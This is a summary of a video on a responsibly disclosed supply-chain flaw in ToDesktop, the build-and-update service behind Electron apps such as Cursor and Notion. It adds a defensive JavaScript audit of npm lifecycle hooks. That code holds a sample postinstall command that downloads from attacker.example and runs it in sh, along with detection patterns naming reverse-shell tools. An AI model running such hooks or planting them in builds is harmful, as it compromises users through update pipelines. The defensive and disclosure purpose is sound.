Summary: the video covers a supply-chain vulnerability found by penetration tester Eva in ToDesktop, a service used to build and ship Electron apps such as Cursor AI and Notion. Compromising ToDesktop's build pipeline yielded credentials that could push updates to any app built with it, which amounts to remote code execution on those apps' users. Eva reported the issue, ToDesktop patched it promptly and tightened its security controls, and the video uses the case to show the value of ethical hackers reporting what they find.
The video discusses a significant security vulnerability reported by an anonymous penetration tester named Eva, which affected several popular applications, including Cursor AI and Notion. The vulnerability stemmed from a service called ToDesktop, which developers use to build Electron-based applications, create their installers, and deliver updates. The flaw allowed remote code execution: an attacker who compromised the service could push a malicious update to every installed copy of any app built with it, and the apps would apply that update without the user's knowledge or consent. The video emphasizes the importance of understanding such vulnerabilities, especially for those who may not be familiar with the technical details.
Eva's investigation began when she noticed that the Cursor installer she had downloaded was connecting to a remote server she did not expect. That connection led her to ToDesktop, the Y Combinator-backed service that packages Electron applications. On inspection she found that the service used Firebase for authentication; Firebase projects are a common source of misconfiguration (client-side keys and permissive security rules), so this became a focus of her reconnaissance. Using the browser developer tools to analyze the Firebase setup, she also found that the web application shipped with source maps enabled, so the minified front-end bundle could be read as its original source, which made exploring the client code and the API calls it made much easier.
As Eva delved deeper, she identified an arbitrary S3 upload vulnerability in the ToDesktop CLI tool: the CLI uploads a developer's project to an S3 bucket, and the checks on what could be uploaded were insufficient. What made this serious was what happened next in the pipeline. The build container runs `npm install` on the uploaded project, and npm honors the lifecycle scripts in package.json, so a `postinstall` entry runs as an arbitrary command inside the build environment. By placing a reverse shell payload in that script, Eva obtained an interactive shell in the container where customer applications were built. From there she found production credentials and a hardcoded Firebase admin key.
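The following is an added example, not ToDesktop's code or anything from the video, showing the mechanism above from the defender's side: a small audit of the lifecycle hooks in a submitted package.json, plus the hardened way to run the install step in a build container so that those hooks never execute. The package name, the `attacker.example` host, and the heuristic patterns are constructed for this example.

```javascript
// Added example (not ToDesktop's code). Audits a submitted package.json for
// npm lifecycle hooks, which run arbitrary commands during `npm install`, and
// shows the build-container setting that disables them.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Heuristics chosen for this example, not an exhaustive list: download-and-run,
// interactive shells, bash /dev/tcp reverse shells, inline interpreters, decoding.
const SUSPICIOUS = [
  /\b(curl|wget)\b/,
  /\b(bash|sh)\s+-i\b/,
  /\/dev\/tcp\//,
  /\b(nc|ncat|netcat)\b/,
  /\bpython[23]?\s+-c\b/,
  /\bnode\s+-e\b/,
  /\bbase64\s+(-d|--decode)\b/,
];

// Returns one finding per lifecycle hook present in the manifest. Any hook is
// at least "medium" because it executes in the build container; hooks that
// match a pattern above are "high".
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] !== 'string') continue;
    const cmd = scripts[hook];
    const matched = SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({ hook, cmd, severity: matched.length ? 'high' : 'medium', matched });
  }
  return findings;
}

// Constructed sample: the shape of a manifest an attacker would submit to a
// hosted build service (host name is a placeholder, not a real payload).
const submittedPackage = {
  name: 'example-electron-app',
  version: '1.0.0',
  scripts: {
    build: 'electron-builder',
    postinstall: 'curl -s http://attacker.example/payload.sh | sh',
  },
};

// Constructed sample with no lifecycle hooks at all.
const cleanPackage = {
  name: 'clean-app',
  version: '1.0.0',
  scripts: { build: 'electron-builder' },
};

// Hardened build-container config: written to the container's user-level
// .npmrc so lifecycle scripts from the project and its dependencies never run.
const HARDENED_NPMRC = 'ignore-scripts=true\n';

// The install command the build container should run. Passing --ignore-scripts
// on the command line wins over any .npmrc a submitted project might include,
// and `npm ci` refuses to proceed without a lockfile.
function buildCommand(npmrcContents) {
  return npmrcContents.includes('ignore-scripts=true') ? 'npm ci --ignore-scripts' : 'npm ci';
}

// Stand-alone run: print the audit of both manifests and the install command.
console.log(JSON.stringify(auditLifecycleScripts(submittedPackage), null, 2));
console.log(JSON.stringify(auditLifecycleScripts(cleanPackage)));
console.log(buildCommand(HARDENED_NPMRC));
```

One caveat a build service has to handle: `--ignore-scripts` also skips the `electron` package's own postinstall, which downloads the Electron binary, and native modules that compile via node-gyp. The usual answer is an explicit allowlist step after install, such as `npm rebuild electron` for known packages, rather than re-enabling hooks for everything the customer uploaded.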
With these credentials, Eva could deploy an arbitrary update to any application built with ToDesktop. Because installed apps trust the service's update channel and apply updates automatically, whatever she shipped would run with the user's privileges on every machine that updated, which is remote code execution across the entire install base of every affected app. The video stresses the scale of that exposure, suggesting that hundreds of millions of users could have been affected had the issue not been addressed promptly.
Following Eva's report, ToDesktop acted quickly to patch the vulnerability and implemented several security measures, including rotating the exposed keys and tightening access controls. They engaged a third-party cybersecurity firm to audit their platform and introduced a security key requirement for app updates, so that only releases authorized with that key can be pushed. The video concludes by acknowledging the importance of ethical hackers like Eva in identifying and reporting vulnerabilities, ultimately helping to improve the security of software applications.